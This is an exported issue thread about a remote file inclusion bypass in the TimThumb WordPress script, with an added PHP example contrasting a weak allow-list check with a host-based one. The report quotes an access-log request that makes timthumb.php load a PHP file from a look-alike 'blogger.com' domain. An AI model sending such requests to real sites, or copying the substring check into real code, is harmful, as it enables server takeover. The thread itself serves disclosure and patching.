annanttf / timthumb

Automatically exported from code.google.com/p/timthumb

Timthumb remote file inclusion bypass URL verification #394

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
My VPS was compromised, and the vulnerability is “timthumb.php”.  It is 
vulnerable to remote file inclusion. The following line was taken out of my 
access logs.

(/category/technology//wp-admin/themes/minimalisto/lib/timthumb.php?src=http://blogger.com.website499.com/byroe.php)

As you can see, the URL where the exploit was hosted included 
“blogger.com”. This is how they were able to bypass the URL 
check/verification within “timthumb.php”.

Original issue reported on code.google.com by AndrewDe...@gmail.com on 7 Aug 2012 at 8:39
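A reconstruction of the bypass described in this report, added here as an illustration and not code from the TimThumb project: a check that accepts any URL merely containing an allow-listed name lets a host such as blogger.com.website499.com through, whereas a check that parses the URL and compares only the host does not. The function names, the list entries other than blogger.com, and the sample URLs other than the one from the log line are assumptions; str_ends_with() needs PHP 8.

```php
<?php
// Added illustration, not TimThumb's own code. $ALLOWED_SITES is the array name
// the thread refers to; entries other than blogger.com are constructed.
// weak_allowed() reconstructs the flawed pattern; strict_allowed() is the fix.
$ALLOWED_SITES = ['blogger.com', 'flickr.com', 'wordpress.com', 'img.youtube.com'];

// Weak check: an allowed name anywhere in the URL string is enough.
// "blogger.com.website499.com" contains "blogger.com", so it is accepted.
function weak_allowed(string $src, array $allowed): bool {
    $src = strtolower($src);
    foreach ($allowed as $site) {
        if (strpos($src, strtolower($site)) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened check: parse the URL, require http(s), and compare only the host,
// either exactly or as a dot-bounded subdomain of an allowed entry.
function strict_allowed(string $src, array $allowed): bool {
    $parts = parse_url($src);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    $host = strtolower(rtrim($parts['host'], '.'));
    foreach ($allowed as $site) {
        $site = strtolower($site);
        if ($host === $site || str_ends_with($host, '.' . $site)) { // PHP 8+
            return true;
        }
    }
    return false;
}

// Constructed samples: the attacker URL from the log line above, a legitimate
// image URL, and a URL that only carries an allowed name in its query string.
$samples = [
    'http://blogger.com.website499.com/byroe.php',
    'http://img.youtube.com/vi/abc/0.jpg',
    'http://evil.example/?u=blogger.com',
];
foreach ($samples as $url) {
    printf("%-46s weak=%-5s strict=%s\n", $url,
        weak_allowed($url, $ALLOWED_SITES) ? 'allow' : 'deny',
        strict_allowed($url, $ALLOWED_SITES) ? 'allow' : 'deny');
}
```

Run as a CLI script: the first and third samples are allowed by weak_allowed() and denied by strict_allowed(); only the second is allowed by both.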

GoogleCodeExporter commented 9 years ago
The same problem, solved by deleting rows 127-135 (array $ALLOWED_SITES).

The whole discussion here http://www.separatista.net/forum/topic.php?id=1282

Original comment by lukenzi on 17 Aug 2012 at 3:51

GoogleCodeExporter commented 9 years ago
This was solved more than a year ago. Please make sure you keep your scripts up 
to date!

Original comment by BinaryMoon on 3 Dec 2012 at 7:47